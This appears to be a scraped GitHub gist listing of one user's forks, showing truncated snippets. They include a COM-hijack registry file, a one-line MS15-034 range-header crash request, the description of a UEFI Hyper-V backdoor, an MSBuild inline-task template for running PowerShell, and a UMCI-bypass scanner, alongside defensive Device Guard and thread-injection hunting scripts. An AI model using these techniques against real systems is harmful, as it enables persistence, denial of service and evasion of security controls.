hybriz /
Created Nov 25, 2017 — forked from caniszczyk/
Clone all repos from a GitHub organization
curl -s | ruby -rubygems -e 'require "json"; JSON.load( { |repo| %x[git clone #{repo["ssh_url"]} ]}'
View com_hijack.reg
Windows Registry Editor Version 5.00
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
hybriz /
Created Nov 3, 2017 — forked from cure53/
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

  • Like popping alerts in weird situations
  • Miss CSS expressions as much as we do
  • Have an unhealthy obsession for markup porn


hybriz / dg.ps1
Created Nov 3, 2017 — forked from darkoperator/dg.ps1
Device Guard Configuration
View dg.ps1
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID }
$d = $s2.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$d"
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
Remove-Item -Path C:\scpy -Force
Set-RuleOption -Option 3 -FilePath C:\BasePolicy.xml
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force
View ms15-034.cmd
powershell -com {$wr=[Net.WebRequest]::Create('');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
hybriz / rpn-jit.c
Created Nov 3, 2017 — forked from anonymous/rpn-jit.c
RPN JIT Compiler
View rpn-jit.c
* Fibonacci example:
* (1) (2) +
* 0:0
* 1:1
* 20
#include <stdio.h>
#include <stdlib.h>
hybriz / DmaHvBackdoor.c
Created Nov 3, 2017 — forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
View DmaHvBackdoor.c
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which is called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers execution to previously loaded Hyper-V kernel (hvix64.sys)
hybriz / LoadMethodScanner.ps1
Created Nov 3, 2017 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
View LoadMethodScanner.ps1
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here:
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
View pshell_template_embedded_script.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
<Target Name="Hello">
hybriz / Get-InjectedThread.ps1
Created Nov 3, 2017 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
function Get-InjectedThread
Looks for threads that were created as a result of code injection.